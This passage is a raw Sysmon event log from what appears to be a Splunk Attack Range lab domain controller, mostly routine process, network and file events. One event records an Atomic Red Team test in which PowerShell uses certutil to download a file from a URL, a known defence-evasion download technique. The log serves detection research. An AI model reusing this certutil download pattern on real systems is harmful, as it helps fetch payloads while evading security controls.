Automation.ni.dll+af3b312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+afe7b42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af37009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3d3b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b59b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3a66d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b3c13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b3785(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b34f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+afe7b42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af37009f(wow64) 154100x80000000000000005917114Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.905{896A638B-B3E1-605B-6769-00000000AE01}2576C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 354300x80000000000000005917113Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.360{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local55637- 10341000x80000000000000005917112Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.721{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917111Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.721{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917110Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.360{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7574B7CF4771C1A5B3000E9B6F59952,SHA256=0F78C3391EBDB65A88D666F89FCE6E0FC7AE548A4D56EF83D6469E6ACFB2EAF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638424Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:22.820{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B387DC2505FE56E2AE2F4641EF201757,SHA256=B36B71103C300C99E55F7729F2867E7DE196D1DFEBEEF85D824054813C42F403,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917186Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:19.861{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1485-false10.0.1.12-8000- 10341000x80000000000000005917185Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.721{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917184Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.721{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917183Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.622{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E2-605B-6C69-00000000AE01}6204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917182Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.620{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E2-605B-6C69-00000000AE01}6204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01f5|UNKNOWN(00007FFA6D95C033) 10341000x80000000000000005917181Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.618{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917180Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.618{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917179Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.617{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917178Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.617{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917177Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.617{896A638B-B8DD-6058-9202-00000000AE01}36323472C:\Windows\system32\csrss.exe{896A638B-B3E2-605B-6C69-00000000AE01}6204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917176Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.617{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E2-605B-6C69-00000000AE01}6204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af43b9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3aaaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+afe7b349(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af37009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3d3b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b59b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3a66d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3e2d74(wow64) 154100x80000000000000005917175Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.603{896A638B-B3E2-605B-6C69-00000000AE01}6204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$datePath = \""certutil-$(Get-Date -format yyyy_MM_dd)\"" New-Item -Path $datePath -ItemType Directory Set-Location $datePath certutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Get-ChildItem | Where-Object {$_.Name -notlike \""*.txt\""} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000005917174Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.602{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-24 21:49:22.186 11241100x80000000000000005917173Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.601{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-24 21:49:22.185 23542300x80000000000000005917172Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.570{896A638B-FBAD-6058-BE11-00000000AE01}4492ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=2587AF3A6A14E9531EBB760E4A1061C1,SHA256=AF2610A2D5FA7095CA77B9E693902AB2C4520C551A46E8B73D892C0A254D592B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005917171Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.541{896A638B-B3E2-605B-6B69-00000000AE01}2208C:\Windows\system32\certutil.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\Atomic-license.txt2021-03-23 13:43:55.516 23542300x80000000000000005917170Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.541{896A638B-B3E2-605B-6B69-00000000AE01}2208ATTACKRANGE\AdministratorC:\Windows\system32\certutil.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\Atomic-license.txtMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917169Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.539{896A638B-B3E2-605B-6B69-00000000AE01}2208ATTACKRANGE\AdministratorC:\Windows\system32\certutil.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\2d2a313164ae3a724cc53b0c8e104dd6053f8402.keyMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917168Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.476{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917167Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.385{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0703C918E4EFAC54C394F5380C09D956,SHA256=47141F86438C2620A96B95F57B38617A4278A40A8C8255A300D9A860828FF75C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917166Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.377{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7117333F08138BCBF9AEE88E09E4C269,SHA256=8A18A93FAB03BC83EC7E9B2C4C1CC4B07D459EC9F58591CC0B47C7F2F9942DCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917165Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.375{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EE8E478A1ECAF6452BFFF73F04D4EE7,SHA256=234683F1DC27D5AAB30C50DA971F620CD2331E077191FA61792C8F35B00D0A09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917164Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.371{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA1E258D664E53931546F612FE92ED29,SHA256=D262BF140F848ADF0165E21C868336651811B0F953F7088C888DDF88E48FAD19,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917163Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.275{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917162Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 